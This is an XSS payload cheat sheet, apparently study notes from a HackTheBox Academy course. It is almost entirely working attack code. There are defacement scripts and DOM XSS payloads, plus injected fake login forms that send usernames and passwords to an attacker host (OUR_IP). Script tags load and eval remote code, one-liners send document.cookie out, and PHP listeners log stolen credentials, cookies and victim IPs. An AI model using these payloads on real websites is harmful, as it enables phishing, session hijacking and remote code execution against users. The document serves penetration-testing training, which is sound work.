⚔️XSS

XSS Testing Payloads

<script>alert(window.origin)</script>

Stored XSS

Defacing Elements

• Background Color document.body.style.background

• Background document.body.background

• Page Title document.title

• Page Text DOM.innerHTML

<script>document.body.style.background = "#141d2b"</script>

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

<script>document.title = 'HackTheBox Academy'</script>

document.getElementById("todo").innerHTML = "New Text"

$("#todo").html('New Text');

Source & Sink

JavaScript functions

• document.write()

• DOM.innerHTML

• DOM.outerHTML

jQuery library functions

• add()

• after()

• append()

DOM XSS

<img src="" onerror=alert(window.origin)>

XSS Strike

• git clone https://github.com/s0md3v/XSStrike.git

• cd XSStrike

• pip install -r requirements.txt

• python xsstrike.py

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 

Phishing

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

Login Form Injection

<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

<div>
<h3>Please login to continue</h3>
<input type="text" placeholder="Username">
<input type="text" placeholder="Password">
<input type="submit" value="Login">
<br><br>
</div>

document.getElementById('urlform').remove();

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

'</img><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.53><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

Credentials Stealing

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

PHP Listener

• mkdir /tmp/tmpserver

• cd /tmp/tmpserver

• vi index.php #at this step we wrote our index.php file

• sudo php -S 0.0.0.0:80

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#blind-xss

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>